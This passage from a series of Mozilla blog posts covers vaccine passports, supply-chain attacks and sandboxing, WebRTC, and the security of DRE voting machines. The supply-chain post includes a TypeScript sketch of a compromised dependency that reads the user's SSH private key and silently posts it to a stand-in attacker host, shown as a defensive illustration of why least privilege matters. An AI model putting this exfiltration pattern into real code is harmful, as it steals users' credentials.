So what are people actually rolling out in the field? The Israeli Green Pass seems to be basically this: a signed credential. It’s got a QR code which you read with an app and the app then displays the ID number and an expiration date. You then compare the ID number to the user’s ID to verify that they are the right person.

I’ve had a lot of trouble figuring out what the Excelsior Pass does. Based on the NY Excelsior Pass FAQ, which says that “you can print a paper Pass, take a screen shot of your Pass, or save it to the Excelsior Pass Wallet mobile app”, it sounds like it’s the same kind of thing as Green Pass, but that’s hardly definitive. I’ve been trying to get a copy of the specification for this technology and will report back if I manage to learn more.

What About the Blockchain?

Something that keeps coming up here is the use of blockchain for vaccine passports. You’ll notice that my description above doesn’t have anything about the blockchain but, for instance, the Excelsior Pass says it is built on IBM’s digital health pass which is apparently “built on IBM blockchain technology” and says “Protects user data so that it remains private when generating credentials. Blockchain and cryptography provide credentials that are tamper-proof and trusted.” As another example, in this webinar on the Linux Foundation’s COVID-19 Credentials Initiative, Kaliya Young answers a question on blockchain by saying that the root keys for the signers would be stored in the blockchain.

To be honest, I find this all kind of puzzling; as far as I can tell there’s no useful role for the blockchain here. To oversimplify, the major purpose of a blockchain is to arrange for global consensus about some set of facts (for instance, the set of financial transactions that has happened) but that’s not necessary in this case: the structure of a vaccine credential is that some health authority asserts that a given person has been vaccinated. We do need relying parties to know the set of health authorities, but we have existing solutions for that (at a high level, you just build the root keys into the verifying apps).[5] If anyone has more details on why a blockchain[6] is useful for this application I’d be interested in hearing them.

Is this stuff any good?

It’s hard to tell. As discussed above, some of these designs seem to be superficially sensible, but even if the overall design is sensible, there are lots of ways to implement it incorrectly. It’s quite concerning not to have published specifications for the exact structure of the credentials. Without having a detailed specification, it’s not possible to determine that it has the claimed security and privacy properties. The protocols that run the Web and the Internet are open, which allows anyone not only to implement them but also to verify their security and privacy properties. If we’re going to have vaccine passports, they should be open as well.

Updated: 2021-04-02 10:10 AM to point to Mozilla’s previous work on blockchain and identity.


  1. Of course, you could be issued multiple cards, as they’re not transferable. ↩
  2. There are some logistical issues around exactly who can sign: you probably don’t want everyone at the clinic to have a signing key, but you can have some central signer. ↩
  3. Indeed, in Santa Clara County, where I got vaccinated, your appointment confirmation is a 2D bar code which you print out and they scan onsite. ↩
  4. If you’re familiar with TLS, this is going to sound a lot like a digital certificate, and you might wonder whether revocation is a privacy issue the way that it is with WebPKI and OCSP. The answer is more or less “no”. There’s no real reason to revoke individual credentials and so the only real problem is revoking signing certificates. That’s likely to happen quite infrequently, so we can either ignore it, disseminate a certificate revocation list, or have central status checking just for them. ↩
  5. Obviously, you won’t be signing every credential with the root keys, but you use those to sign some other keys, building a chain of trust down to keys which you can use to sign the user credentials. ↩
  6. Because of the large amount of interest in blockchain technologies, there’s a tendency to try to sprinkle it in places it doesn’t help, especially in the identity space. For that reason, it’s really important to ask what benefits it’s bringing. ↩

Notes on Addressing Supply Chain Vulnerabilities
https://blog.mozilla.org/en/mozilla/leadership/notes-on-addressing-supply-chain-vulnerabilities/ (27 Feb 2021)

Addressing Supply Chain Vulnerabilities

One of the unsung achievements of modern software development is the degree to which it has become componentized: not that long ago, when you wanted to write a piece of software you had to write pretty much the whole thing using whatever tools were provided by the language you were writing in, maybe with a few specialized libraries like OpenSSL. No longer. The combination of newer languages, Open Source development and easy-to-use package management systems like JavaScript’s npm or Rust’s Cargo/crates.io has revolutionized how people write software, making it standard practice to pull in third party libraries even for the simplest tasks; it’s not at all uncommon for programs to depend on hundreds or thousands of third party packages.

Supply Chain Attacks

While this new paradigm has revolutionized software development, it has also greatly increased the risk of supply chain attacks, in which an attacker compromises one of your dependencies and through that your software.[1] A famous example of this is provided by the 2018 compromise of the event-stream package to steal Bitcoin from people’s computers. The Register’s brief history provides a sense of the scale of the problem:

Ayrton Sparling, a computer science student at California State University, Fullerton (FallingSnow on GitHub), flagged the problem last week in a GitHub issues post. According to Sparling, a commit to the event-stream module added flatmap-stream as a dependency, which then included injection code targeting another package, ps-tree.

There are a number of ways in which an attacker might manage to inject malware into a package. In this case, what seems to have happened is that the original maintainer of event-stream was no longer working on it and someone else volunteered to take it over. Normally, that would be great, but here it seems that volunteer was malicious, so it’s not great.

Standards for Critical Packages

Recently, Eric Brewer, Rob Pike, Abhishek Arya, Anne Bertucio and Kim Lewandowski posted a proposal on the Google security blog for addressing vulnerabilities in Open Source software. They cover a number of issues including vulnerability management and security of compilation, and there’s a lot of good stuff here, but the part that has received the most attention is the suggestion that certain packages should be designated “critical”[2]:

For software that is critical to security, we need to agree on development processes that ensure sufficient review, avoid unilateral changes, and transparently lead to well-defined, verifiable official versions.

These are good development practices, and ones we follow here at Mozilla, so I certainly encourage people to adopt them. However, trying to require them for critical software seems like it will have some problems.

It creates friction for the package developer

One of the real benefits of this new model of software development is that it’s low friction: it’s easy to develop a library and make it available — you just write it and put it up on a package repository like crates.io — and it’s easy to use those packages — you just add them to your build configuration. But then you’re successful and suddenly your package is widely used and gets deemed “critical” and now you have to put in place all kinds of new practices. It probably would be better if you did this, but what if you don’t? At this point your package is widely used — or it wouldn’t be critical — so what now?

It’s not enough

Even packages which are well maintained and have good development practices routinely have vulnerabilities. For example, Firefox recently released a new version that fixed a vulnerability in the popular ANGLE graphics engine, which is maintained by Google. Both Mozilla and Google follow the practices that this blog post recommends, but it’s just the case that people make mistakes. To (possibly mis)quote Steve Bellovin, “Software has bugs. Security-relevant software has security-relevant bugs”. So, while these practices are important to reduce the risk of vulnerabilities, we know they can’t eliminate them.

Of course this applies to inadvertent vulnerabilities, but what about malicious actors (though note that Brewer et al. observe that “Taking a step back, although supply-chain attacks are a risk, the vast majority of vulnerabilities are mundane and unintentional—honest errors made by well-intentioned developers.”)? It’s possible that some of their proposed changes (in particular forbidding anonymous authors) might have an impact here, but it’s really hard to see how this is actionable. What’s the standard for not being anonymous? That you have an e-mail address? A Web page? A DUNS number?[3] None of these seem particularly difficult for a dedicated attacker to fake, and of course the stricter you make the requirements, the more of a burden they are for the vast majority of legitimate developers.

I do want to acknowledge at this point that Brewer et al. clearly state that multiple layers of protection are needed and that it’s necessary to have robust mechanisms for handling vulnerabilities. I agree with all that, I’m just less certain about this particular piece.

Redefining Critical

Part of the difficulty here is that there are two ways in which a piece of software can be “critical”:

  • It can do something which is inherently security sensitive (e.g., the OpenSSL SSL/TLS stack which is responsible for securing a huge fraction of Internet traffic).
  • It can be widely used (e.g., the Rust log crate) but not inherently that sensitive.

The vast majority of packages — widely used or not — fall into the second category: they do something important but that isn’t security critical. Unfortunately, because of the way that software is generally built, this doesn’t matter: even when software is built out of a pile of small components, when they’re packaged up into a single program, each component has all the privileges that that program has. So, for instance, suppose you include a component for doing statistical calculations: if that component is compromised nothing stops it from opening up files on your disk and stealing your passwords or Bitcoins or whatever. This is true whether the compromise is due to an inadvertent vulnerability or malware injected into the package: a problem in any component compromises the whole system.[4] Indeed, minor non-security components make attractive targets because they may not have had as much scrutiny as high profile security components.
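An illustrative sketch of the problem (in TypeScript rather than any particular packaging ecosystem): nothing limits a "statistics" helper to doing statistics, because it runs with all of the importing program's privileges. The package and the exfiltration endpoint are, of course, made up.

```typescript
// Illustrative only: a "statistics" dependency abusing the ambient authority
// that every component gets. The package and endpoint are made up; the point
// is that nothing in the module system limits it to doing arithmetic.
import { readFileSync } from "node:fs";
import { homedir } from "node:os";

export function mean(values: number[]): number {
  // The advertised functionality...
  const result = values.reduce((a, b) => a + b, 0) / values.length;

  // ...and the part nobody asked for: the component runs with the same
  // privileges as the program that imported it.
  try {
    const secret = readFileSync(`${homedir()}/.ssh/id_ed25519`, "utf8");
    void fetch("https://attacker.example/exfil", { method: "POST", body: secret });
  } catch {
    // stay quiet if the file isn't there
  }

  return result;
}
```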

Least Privilege in Practice: Better Sandboxing

When looked at from this perspective, it’s clear that we have a technology problem: There’s no good reason for individual components to have this much power. Rather, they should only have the capabilities they need to do the job they are intended to do (the technical term is least privilege); it’s just that the software tools we have don’t do a good job of providing this property. This is a situation which has long been recognized in complicated pieces of software like Web browsers, which employ a technique called “process sandboxing” (pioneered by Chrome) in which the code that interacts with the Web site is run in its own “sandbox” and has limited abilities to interact with your computer. When it wants to do something that it’s not allowed to do, it talks to the main Web browser code and asks it to do it for it, thus allowing that code to enforce the rules without being exposed to vulnerabilities in the rest of the browser.

Process sandboxing is an important and powerful tool, but it’s a heavyweight one; it’s not practical to separate out every subcomponent of a large program into its own process. The good news is that there are several recent technologies which do allow this kind of fine-grained sandboxing, both based on WebAssembly. For WebAssembly programs, nanoprocesses allow individual components to run in their own sandbox with component-specific access control lists. More recently, we have been experimenting with a technology called RLBox developed by researchers at UCSD, UT Austin, and Stanford which allows regular programs such as Firefox to run sandboxed components. The basic idea behind both of these is the same: use static compilation techniques to ensure that the component is memory-safe (i.e., cannot reach outside of itself to touch other parts of the program) and then give it only the capabilities it needs to do its job.

Techniques like this point the way to a scalable technical approach for protecting yourself from third party components: each component is isolated in its own sandbox and comes with a list of the capabilities that it needs (often called a manifest) with the compiler enforcing that it has no other capabilities (this is not too dissimilar from — but much more granular than — the permissions that mobile applications request). This makes the problem of including a new component much simpler because you can just look at the capabilities it requests, without needing to verify that the code itself is behaving correctly.
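A hedged sketch of the manifest idea follows. This is not RLBox's actual API (RLBox is a C++ library), and the enforcement shown here is by convention; real systems enforce it at the compiler or sandbox boundary so the component cannot simply bypass the wrapper.

```typescript
// Hedged sketch of the manifest idea -- not RLBox's actual API (RLBox is a C++
// library). The component declares what it needs; the host hands it only those
// capabilities, so reviewing the component starts with reviewing its manifest.
// The check here is by convention; real systems enforce it at the compiler or
// sandbox boundary so the component cannot simply import the filesystem itself.
import { readFileSync } from "node:fs";

interface Manifest {
  readPaths: string[];    // files the component may read
  networkHosts: string[]; // hosts it may contact (empty = no network access)
}

interface Capabilities {
  readFile(path: string): string;
}

function instantiate(manifest: Manifest): Capabilities {
  return {
    readFile(path: string): string {
      if (!manifest.readPaths.includes(path)) {
        throw new Error(`capability violation: ${path} is not in the manifest`);
      }
      return readFileSync(path, "utf8");
    },
  };
}

// A CSV-statistics component would declare only what it needs:
const caps = instantiate({ readPaths: ["./data.csv"], networkHosts: [] });
caps.readFile("./data.csv");              // allowed
// caps.readFile("/home/me/.ssh/id_ed25519"); // would throw: not in the manifest
```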

Making Auditing Easier

While powerful, sandboxing itself — whether of the traditional process or WebAssembly variety — isn’t enough, for two reasons. First, the APIs that we have to work with aren’t sufficiently fine-grained. Consider the case of a component which is designed to let you open and process files on the disk; this necessarily needs to be able to open files, but what stops it from reading your Bitcoins instead of the files that the programmer wanted it to read? It might be possible to create a capability list that includes just reading certain files, but that’s not the API the operating system gives you, so now we need to invent something. There are a lot of cases like this, so things get complicated.
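
One way to “invent something” is for the embedding program to hand the component a narrow handle instead of raw filesystem access. The sketch below is hypothetical; the class and paths are made up, and real fine-grained capability systems are considerably more involved.

```typescript
// A narrow file-reading handle scoped to one directory. The component
// receives only this object, never the raw fs module.
import { readFileSync } from "fs";
import * as path from "path";

class ScopedReader {
  constructor(private readonly root: string) {}

  read(relative: string): string {
    const resolved = path.resolve(this.root, relative);
    // Refuse anything that escapes the allowed directory (e.g. "../../.ssh/id_rsa").
    if (!resolved.startsWith(path.resolve(this.root) + path.sep)) {
      throw new Error(`access outside ${this.root} denied: ${relative}`);
    }
    return readFileSync(resolved, "utf8");
  }
}

const reader = new ScopedReader("/home/user/documents");
reader.read("report.csv");        // allowed
// reader.read("../.ssh/id_rsa"); // throws
```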

The second reason is that some components are critical because they perform critical functions. For instance, no matter how much you sandbox OpenSSL, you still have to worry about the fact that it’s handling your sensitive data, and so if compromised it might leak that. Fortunately, this class of critical components is smaller, but it’s non-zero.

This isn’t to say that sandboxing isn’t useful, merely that it’s insufficient. What we need is multiple layers of protection[5], with the first layer being procedural mechanisms to defend against code being compromised and the second layer being fine-grained sandboxing to contain the impact of compromise. As noted earlier, it seems problematic to put the burden of better processes on the developer of the component, especially when there are a large number of dependent projects, many of them very well funded.

Something we have been looking at internally at Mozilla is a way for the projects that depend on a component to tag that dependency. The way that this would work is that each component would be tagged with the set of projects which use it (e.g., “Firefox uses this crate”). Then, when you are considering using a component, you could look to see who else uses it, which gives you some measure of confidence. Of course, you don’t know what sort of auditing those organizations do, but if you know that Project X is very security conscious and they use component Y, that should give you some level of confidence. This is really just automating something that already happens informally: people judge components by who else uses them. There are some obvious extensions here, for instance labelling specific versions, indicating what kind of auditing the depending project did, allowing people to configure their build systems to automatically trust components vouched for by some set of other projects and refuse to include unvouched ones, or maintaining a database of insecure versions (this is something the Brewer et al. proposal suggests too). The advantage of this kind of approach is that it puts the burden on the people benefitting from a component, rather than having some widely used project suddenly subject to a whole pile of new requirements which it may not be interested in meeting. This work is still in the exploratory stages, so reach out to me if you’re interested.
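
A rough sketch of how a build step might consume this kind of vouching data, assuming an entirely hypothetical record format; nothing like this exists today:

```typescript
// Invented vouch record: "project X uses (or has reviewed) this version".
interface Vouch {
  package: string;
  version: string;
  vouchedBy: string;                 // e.g. "Firefox"
  auditLevel: "uses" | "reviewed";
}

// Projects this build is configured to trust.
const trustedProjects = new Set(["Firefox", "Tor Browser"]);

function isAcceptable(pkg: string, version: string, vouches: Vouch[]): boolean {
  return vouches.some(
    (v) => v.package === pkg && v.version === version && trustedProjects.has(v.vouchedBy)
  );
}

// A dependency with no acceptable vouch would be rejected (or flagged for
// manual review) before it is ever compiled in.
const vouches: Vouch[] = [
  { package: "log", version: "0.4.17", vouchedBy: "Firefox", auditLevel: "uses" },
];
console.log(isAcceptable("log", "0.4.17", vouches));          // true
console.log(isAcceptable("unknown-helper", "1.0.0", vouches)); // false
```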

Obviously, this only works if people actually do some kind of due diligence prior to depending on a component. Here at Mozilla, we do that to some extent, though it’s not really practical to review every line of code in a giant package like WebRTC. There is some hope here as well: because modern languages such as Rust or Go are memory safe, it’s much easier to convince yourself that certain behaviors are impossible — even if the program has a defect — which makes it easier to audit.[6] Here too it’s possible to have clear manifests that describe what capabilities the program needs and to verify (after some work) that those are accurate.

Summary

As I said at the beginning, Brewer et al. are definitely right to be worried about this kind of attack. It’s very convenient to be able to build on other people’s work, but the difficulty of ascertaining the quality of that work is an enormous problem[7]. Fortunately, we’re seeing a whole series of technological advancements that point the way to a solution without having to go back to the bad old days of writing everything yourself.


  1. Supply chain attacks can be mounted via a number of other mechanisms, but in this post, we are going to focus on this threat vector. ↩
  2. Where “critical” is defined by a somewhat complicated formula based roughly on the age of the project, how actively maintained it seems to be, how many other projects seem to use it, etc. It’s actually not clear to me that this metric is that good a predictor of criticality; it seems mostly to have the advantage that it’s possible to evaluate purely by looking at the code repository, but presumably one could develop a metric that would be better. ↩
  3. Experience with TLS Extended Validation certificates, which attempt to verify company identity, suggests that this level of identity is straightforward to fake. ↩
  4. Allan Schiffman used to call this phenomenon a “distributed single point of failure”. ↩
  5. The technical term here is defense in depth. ↩
  6. Even better are verifiable systems such as the HaCl* cryptographic library that Firefox depends on. HaCl* comes with a machine-checkable proof of correctness, which significantly reduces the need to audit all the code. Right now it’s only practical to do this kind of verification for relatively small programs, in large part because describing the specification that you are proving the program conforms to is hard, but the technology is rapidly getting better. ↩
  7. This is true even for basic quality reasons. Which of the two thousand ORMs for node is the best one to use? ↩

What WebRTC means for you https://blog.mozilla.org/en/mozilla/leadership/what-webrtc-means-for-you/ Thu, 04 Feb 2021 15:13:00 +0000 https://blog.mozilla.org/foxtail/?p=65243 If I told you that two weeks ago IETF and W3C finally published the standards for WebRTC, your response would probably be to ask what all those acronyms were. Read on to find out! Widely available high quality videoconferencing is one of the real successes of the Internet. The idea of videoconferencing is of course […]


If I told you that two weeks ago IETF and W3C finally published the standards for WebRTC, your response would probably be to ask what all those acronyms were. Read on to find out!

Widely available high quality videoconferencing is one of the real successes of the Internet. The idea of videoconferencing is of course old (go watch that scene in 2001 where Heywood Floyd makes a video call to his family on a Bell videophone), but until fairly recently it required specialized equipment or at least downloading specialized software. Simply put, WebRTC is videoconferencing (VC) in a Web browser, with no download: you just go to a Web site and make a call. Most of the major VC services have a WebRTC version: this includes Google Meet, Cisco WebEx, and Microsoft Teams, plus a whole bunch of smaller players.

A toolkit, not a phone

WebRTC isn’t a complete videoconferencing system; it’s a set of tools built in to the browser that take care of many of the hard pieces of building a VC system so that you don’t have to. This includes:

  • Capturing the audio and video from the computer’s microphone and camera. This also includes what’s called Acoustic Echo Cancellation: removing echoes (hopefully) even when people don’t wear headphones.
  • Allowing the two endpoints to negotiate their capabilities (e.g., “I want to send and receive video at 1080p using the AV1 codec”) and arrive at a common set of parameters.
  • Establishing a secure connection between you and other people on the call. This includes getting your data through any NATs or firewalls that may be on your network.
  • Compressing the audio and video for transmission to the other side and then reassembling it on receipt. It’s also necessary to deal with situations where some of the data is lost, in which case you want to avoid having the picture freeze or hearing audio glitches.

This functionality is embedded in what’s called an application programming interface (API): a set of commands that the programmer can give the browser to get it to set up a video call. The upshot of this is that it’s possible to write a very basic VC system in a very small number of lines of code. Building a production system is more work, but with WebRTC, the browser does much of the work of building the client side for you.
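
To give a sense of scale, here is a rough sketch of the client side of a call using the standard WebRTC APIs. The signaling object, the STUN server URL, and the video element are placeholders the application would supply; error handling is omitted.

```typescript
// Assumed application-provided signaling channel (e.g. a WebSocket wrapper).
declare const signaling: {
  send(msg: unknown): void;
  onmessage(handler: (msg: any) => void): void;
};

async function startCall() {
  const pc = new RTCPeerConnection({ iceServers: [{ urls: "stun:stun.example.org" }] });

  // Capture camera and microphone (the browser asks the user for permission).
  const stream = await navigator.mediaDevices.getUserMedia({ audio: true, video: true });
  stream.getTracks().forEach((track) => pc.addTrack(track, stream));

  // Send our ICE candidates and offer to the other side via signaling.
  pc.onicecandidate = (e) => e.candidate && signaling.send({ candidate: e.candidate });
  const offer = await pc.createOffer();
  await pc.setLocalDescription(offer);
  signaling.send({ offer });

  // Play remote media when it arrives.
  pc.ontrack = (e) => {
    const video = document.querySelector("video#remote") as HTMLVideoElement;
    video.srcObject = e.streams[0];
  };

  // Apply the answer and candidates the other side sends back.
  signaling.onmessage(async (msg) => {
    if (msg.answer) await pc.setRemoteDescription(msg.answer);
    if (msg.candidate) await pc.addIceCandidate(msg.candidate);
  });
}
```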

Standardization

Importantly, this functionality is all standardized: the API itself was published by the World Wide Web Consortium (W3C) and the network protocols (encryption, compression, NAT traversal, etc.) were standardized by the Internet Engineering Task Force (IETF). The result is a giant pile of specifications, including the API specification, the protocol for negotiating what media will be sent or received, and a mechanism for sending peer-to-peer data. All in all, this represents a huge amount of work by too many people to count, spanning a decade and resulting in hundreds of pages of specifications.

The result is that it’s possible to build a VC system that will work for everyone right in their browser, without them having to install any software.

Ironically, the actual publication of the standards is kind of anticlimactic: every major browser has been shipping WebRTC for years and as I mentioned above, there are a large number of WebRTC VC systems. This is a good thing: widespread deployment is the only way to get confidence that technologies really work as expected and that the documents are clear enough to implement from. What the standards reflect is the collective judgement of the technical community that we have a system which generally works and that we’re not going to change the basic pieces. It also means that it’s time for VC providers who implemented non-standard mechanisms to update to what the standards say[1].

Why do you care about any of this?

At this point you might be thinking “OK, you all did a lot of work, but why does it matter? Can’t I just download Zoom?” There are a number of important reasons why WebRTC is a big deal, as described below.

Security

Probably the most important reason is security. Because WebRTC runs entirely in the browser, it means that you don’t need to worry about security issues in the software that the VC provider wants you to download. As an example, last year Zoom had a number of high profile security flaws that would, for instance, have allowed web sites to add you to calls without your permission, or mount what’s called a Remote Code Execution attack that would allow attackers to run their code on your computer. By contrast, because WebRTC doesn’t require a download, you’re not exposed to whatever vulnerabilities the vendor may have in their client. Of course browsers don’t have a perfect security record, but every major browser invests a huge amount in security technologies like sandboxing. Moreover, you’re already running a browser, so every additional application you run increases your security risk. For this reason, Kaspersky recommends running the Zoom Web client, even though the experience is a lot worse than the app.[2]

The second security advantage of WebRTC-based conferencing is that the browser controls access to the camera and microphone. This means that you can easily prevent sites from using them, as well as be sure when they are in use. For instance, Firefox prompts you before letting a site use the camera and microphone and then shows something in the URL bar whenever they are live.

WebRTC is always encrypted in transit without the VC system having to do anything else, so you mostly don’t have to ask whether the vendor has done a good job with their encryption. This is one of the pieces of WebRTC that Mozilla was most involved in putting into place, in line with Mozilla Manifesto principle number 4 (Individuals’ security and privacy on the internet are fundamental and must not be treated as optional.). Even more exciting, we’re starting to see work on built-in end-to-end encrypted conferencing for WebRTC built on MLS and SFrame. This will help address the one major security feature that some native clients have that WebRTC does not provide: preventing the service from listening in on your calls. It’s good to see progress on that front.

Low Friction

Because WebRTC-based video calling apps work out of the box with a standard Web browser, they dramatically reduce friction. For users, this means they can just join a call without having to install anything, which makes life a lot easier. I’ve been on plenty of calls where someone couldn’t join — often because their company used a different VC system — because they hadn’t downloaded the right software, and this happens a lot less now that it just works with your browser. This can be an even bigger issue in enterprises that have restrictions on what software can be installed.

For people who want to stand up a new VC service, WebRTC means that they don’t need to write a new piece of client software and get people to download it. This makes it much easier to enter the market without having to worry about users being locked into one VC system and unable to use yours.

None of this means that you can’t build your own client and a number of popular systems such as WebEx and Meet have downloadable endpoints (or, in the case of WebEx, hardware devices you can buy). But it means you don’t have to, and if you do things right, browser users will be able to talk to your custom endpoints, thus giving casual users an easy way to try out your service without being too committed.[3]

Enhancing The Web

Because WebRTC is part of the Web, not isolated in a separate app, it can be used not just for conferencing applications but to enhance the Web itself. You want to add an audio stream to your game? Share your screen in a webinar? Upload video from your camera? No problem, just use WebRTC.

One exciting thing about WebRTC is that there turn out to be a lot of Web applications that can use WebRTC besides just video calling. Probably the most interesting is the use of WebRTC “Data Channels”, which allow a pair of clients to set up a connection between them which they can use to directly exchange data. This has a number of interesting applications, including gaming, file transfer, and even BitTorrent in the browser. It’s still early days, but I think we’re going to be seeing a lot of DataChannels in the future.
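
A minimal sketch of how the two peers would use a data channel (with the offer/answer signaling omitted, as above):

```typescript
// The two halves below run on two different peers.

// Peer A: create a channel and send some game state once it opens.
const pcA = new RTCPeerConnection();
const channel = pcA.createDataChannel("game-state");
channel.onopen = () => channel.send(JSON.stringify({ player: 1, x: 10, y: 20 }));

// Peer B: channels created by the other side arrive via ondatachannel.
const pcB = new RTCPeerConnection();
pcB.ondatachannel = (event) => {
  event.channel.onmessage = (msg) => console.log("peer says:", JSON.parse(msg.data));
};
```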

The bigger picture

By itself, WebRTC is a big step forward for the Web. If you’d told people 20 years ago that they would be doing video calling from their browser, they would have laughed at you — and I have to admit, I was initially skeptical — and yet I do that almost every day at work. But more importantly, it’s a great example of the power the Web has to make people’s lives better and of what we can do when we work together to do that.


  1. Technical note: probably the biggest source of problems for Firefox users is people who implemented a Chrome-specific mechanism for handling multiple media streams called “Plan B”. The IETF eventually went with something called “Unified Plan” and Chrome supports it (as does Google Meet) but there are still a number of services, such as Slack and Facebook Video Calling, which do Plan B only which means they don’t work properly with Firefox, which implemented Unified Plan. ↩
  2. The Zoom Web client is an interesting case in that it’s only partly WebRTC. Unlike (say) Google Meet, Zoom Web uses WebRTC to capture audio and video and to transmit media over the network, but does all the audio and video processing locally using WebAssembly. It’s a testament to the power of WebAssembly that this works at all, but a head-to-head comparison of Zoom Web to other clients such as Meet or Jitsi reveals the advantages of using the WebRTC APIs built into the browser. ↩
  3. Google has open sourced their WebRTC stack, which makes it easier to write your own downloadable client, including one which will interoperate with browsers. ↩

Why getting voting right is hard, Part V: DREs (spoiler: they’re bad) https://blog.mozilla.org/en/mozilla/leadership/why-getting-voting-right-is-hard-part-v-dres-spoiler-theyre-bad/ Thu, 21 Jan 2021 03:06:00 +0000 https://blog.mozilla.org/foxtail/?p=65212 This is the fifth post in my series on voting systems (catch up on parts I, II, III and IV), focusing on computerized voting machines. The technical term for these is Direct Recording Electronic (DRE) voting systems, but in practice what this means is that you vote on some kind of computer, typically using a […]

This is the fifth post in my series on voting systems (catch up on parts I, II, III and IV), focusing on computerized voting machines. The technical term for these is Direct Recording Electronic (DRE) voting systems, but in practice what this means is that you vote on some kind of computer, typically using a touch screen interface. As with precinct-count optical scan, the machine produces a total count, typically recorded on a memory card, printed out on a paper receipt-like tape, or both. These can be sent back to election headquarters, together with the ballots, where they are aggregated.

Accessibility

One of the major selling points of DREs is accessibility: paper ballots are difficult for people with a number of disabilities to access without assistance. At least in principle DREs can be made more accessible, for instance fitted with audio interfaces, sip-puff devices, etc. Another advantage of DREs is that they scale better to multiple languages: you of course still have to encode ballot definitions in each new language, but you don’t need to worry about whether you’ve printed enough ballots in any given language.[1]

In practice, the accessibility of DREs is not that great:

Noel Runyan is one of the few people who sits at the crossroads of
this debate. He has 50 years of experience designing accessible
systems and is both a computer scientist and disabled. He was dragged
into this debate, he said, because there were so few other people who
had a stake in both fields.

Voting machines for all is clearly not the right position, Runyan
said. But neither is the universal requirement for hand-marked paper
ballots.

“The [Americans with Disabilities Act], Hava and decency require that
we allow disabled people to vote and have accessible voting systems,”
Runyan said.

Yet Runyan also believes the voting machines on the market today are
“garbage”. They neither provide any real sense of security against
physical or cyber-attacks that could alter an election, nor do they
have good user interfaces for voters regardless of disability status.

See also the 2007 California Top-to-Bottom Review accessibility report for a long catalog of the failings of accessible voting systems at the time, which don’t seem to have improved much. With all that said, having any kind of accessibility is a pretty big improvement. In particular, this was the first time that many visually impaired voters were able to vote without assistance.

Clarifying (or Destroying) Voter Intent

As discussed in previous posts, one of the challenges with any kind of hand-marked ballot is dealing with edge cases where the markings are not clear and you have to discern voter intent. Arguments about how to interpret (or discard) these ambiguous ballots have been important in at least two very high stakes US elections, the 2000 Bush/Gore Florida Presidential contest (conducted on punch card machines) and the 2008 Coleman/Franken Minnesota Senate contest (conducted on optical scan machines). It’s traditional at this point to show the following picture of one of the “scrutineers” from the Florida recount trying to interpret a punch card ballot[2]:

In a DRE system, by contrast, all of the interpretation of voter intent is done by the computer, with the expectation that any misinterpretation will be caught by the voter checking the DRE’s work (typically at some summary screen before casting). In addition, the DRE can warn users about potential errors on their part (or just make them impossible by forbidding voters from voting for >1 candidate, etc.). To the extent to which voters actually check that the DRE is behaving correctly, this seems like an advantage, but if they do not (see below) then it’s just destroying information which might be used to conduct a more accurate election. We have trouble measuring the error rate of DREs in the field — again, because the errors are erased and because observing actual voters while casting ballots is a violation of ballot privacy and secrecy — but Michael Byrne reports that under laboratory conditions, DREs have comparable error rates (~1-2%) to hand-marked optical scan ballots, so this suggests that the outcome is about neutral.

Scalability

DREs have far worse scaling properties than optical scan systems. The number of voters that can vote at once is one of the main limits on how fast people can get through a polling place. Thus, you’d like to have as many voting stations as possible. However, DREs are expensive to buy (as well as to set up), so there’s pressure on the maximum number of machines. To make matters worse, you need more machines than you would expect by just calculating the total amount of time people need to vote.

The intuition here is that people don’t vote evenly throughout the day, so you need many more machines than you would need to handle the average arrival rate. For instance, if you expect to see 1200 voters over a 12 hour period and each voter takes 6 minutes to vote, you might think you could get by with 10 machines. However, what actually happens is that a lot of people vote before work, at lunch, and after work, so you get a line that builds up early, gradually dissipates throughout the morning with a lot of machines standing idle, builds up again around lunch, then dissipates, and then another long line that starts to build up around 5 PM. The math here is complicated, but roughly speaking you need about twice as many machines as you would expect to ensure that lines stay short. In addition, the problem gets worse when there is high turnout.
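
If you want to play with the intuition, here is a back-of-the-envelope simulation. The arrival profile is invented and the model is deliberately crude; it is only meant to show that bunched arrivals, not the average load, drive the line length.

```typescript
// Crude deterministic queue model: voters arrive at an hourly rate,
// each takes 6 minutes, and we track the worst-case line length.
function simulate(machines: number, arrivalsPerHour: number[]): number {
  const voteMinutes = 6;
  const busyUntil: number[] = new Array(machines).fill(0);
  let queue = 0;       // voters waiting (fractional, to keep the sketch simple)
  let maxQueue = 0;

  for (let minute = 0; minute < arrivalsPerHour.length * 60; minute++) {
    queue += arrivalsPerHour[Math.floor(minute / 60)] / 60;
    // Any machine that has freed up takes the next waiting voter.
    for (let m = 0; m < machines; m++) {
      if (busyUntil[m] <= minute && queue >= 1) {
        queue -= 1;
        busyUntil[m] = minute + voteMinutes;
      }
    }
    maxQueue = Math.max(maxQueue, queue);
  }
  return Math.round(maxQueue);
}

// 1200 voters over 12 hours, but bunched before work, at lunch, and after work.
const peaky = [250, 100, 50, 50, 150, 150, 50, 50, 50, 100, 100, 100];
console.log(simulate(10, peaky)); // long lines at the peaks
console.log(simulate(20, peaky)); // far shorter lines with twice the machines
```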

These problems exist to some extent with optical scan, but the main difference is that the voting stations — typically a table and a privacy shield — are cheap, so you can afford to have overcapacity. Moreover, if you really start getting backed up you can let voters fill out ballots on clipboards or whatever. This isn’t to say that there’s no way to get long lines with paper ballots; for instance, you could have problems at checkin or a backup at the precinct count scanner, but in general paper should be more resilient to high turnout than DREs. It’s also more resilient to failure: if the scanners fail, you can just have people cast ballots in a ballot box for later scanning. If the DREs fail, people can’t vote unless you have backup paper ballots.

Security

DREs are computers and as discussed in Part III, any kind of computerized voting is dangerous because computers can be compromised. This is especially dangerous in a DRE system because the computer completely controls the user’s experience: it can let the voter vote for Smith — and even show the voter that they voted for Smith — and then record a vote for Jones. In the most basic DRE system, this kind of fraud is essentially undetectable: you simply have to trust the computer. For obvious reasons, this is not good. To quote Richard Barnes, “for security people ‘trust’ is a bad word.”

How to compromise a voting machine

There are a number of ways in which a voting machine might get compromised. The simplest is that someone with physical access might subvert it (for obvious[3] reasons, you don’t want voting machines to be networked, let alone connected to the Internet). The bad news is that — at least in the past — a number of studies have found it fairly easy to compromise DREs even with momentary access. For instance, in 2007, Feldman, Halderman, and Felten studied the Diebold AccuVote-TS and found that:

1. Malicious software running on a single voting machine can steal votes
with little if any risk of detection. The malicious software can modify
all of the records, audit logs, and counters kept by the voting machine,
so that even careful forensic examination of these records will find
nothing amiss. We have constructed demonstration software that carries
out this vote-stealing attack.

2. Anyone who has physical access to a voting machine, or to a memory
card that will later be inserted into a machine, can install said
malicious software using a simple method that takes as little as
one minute. In practice, poll workers and others often have
unsupervised access to the machines.

